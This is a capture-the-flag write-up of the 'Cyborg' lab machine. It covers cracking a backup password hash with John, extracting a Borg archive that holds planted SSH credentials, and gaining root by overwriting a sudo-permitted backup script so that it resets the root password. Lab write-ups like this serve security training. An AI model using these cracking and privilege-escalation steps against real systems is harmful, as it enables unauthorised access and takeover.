Skip to main content

Cyborg

JOHN

  • We can Brute-Force the HASH using John
  • Password: squidward
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
squidward        (music_archive)
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn. >> music_archive:squidward

BORG

  • The archive.tar is a Borg Backup.
  • Listing the Contents of the Backup...
attacker@machine:~$ borg list final_archive 
music_archive                        Tue, 2020-12-29 15:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]
  • Extracting Files from Borg Backup using the Cracked Password: squidward
attacker@machine:~$ borg extract final_archive::music_archive
drwxrwxr-x 2 alex alex          0 29 dic  2020 home/alex/Desktop
-rw-r--r-- 2 root root         71 29 dic  2020 home/alex/Desktop/secret.txt
drwxrwxr-x 2 alex alex          0 29 dic  2020 home/alex/Documents
-rw-r--r-- 2 root root        110 29 dic  2020 home/alex/Documents/note.txt
  • The File in the Documents Directory: note.txt contains Alex SSH Credentials.
  • alex : S3cretP@s3 
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:S3cretP@s3

Privilege Escalation

  • Using SSH Credentials to Login: alex:S3cretP@s3
alex@ubuntu:~$ id
uid=1000(alex) gid=1000(alex) groups=1000(alex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

  • The User alex can run: /etc/mp3backups/backup.sh as ROOT
  • We own the File but it Lacks Write Permissions.
  • We can assign the Correct Permissions Using: chmod
alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
alex@ubuntu:~$ ls -l /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30  2020 /etc/mp3backups/backup.sh
alex@ubuntu:~$ chmod +w /etc/mp3backups/backup.sh

  • Modifying the Script to change ROOT Password
alex@ubuntu:~$ echo '#!/bin/bash' > /etc/mp3backups/backup.sh
alex@ubuntu:~$ echo 'echo -e "password\npassword" | passwd root' >> /etc/mp3backups/backup.sh
alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh

  • We can change the User from alex ➜ root by using the Password: password
alex@ubuntu:~$ su -
Password: 
root@ubuntu:~$ id
uid=0(root) gid=0(root) groups=0(root)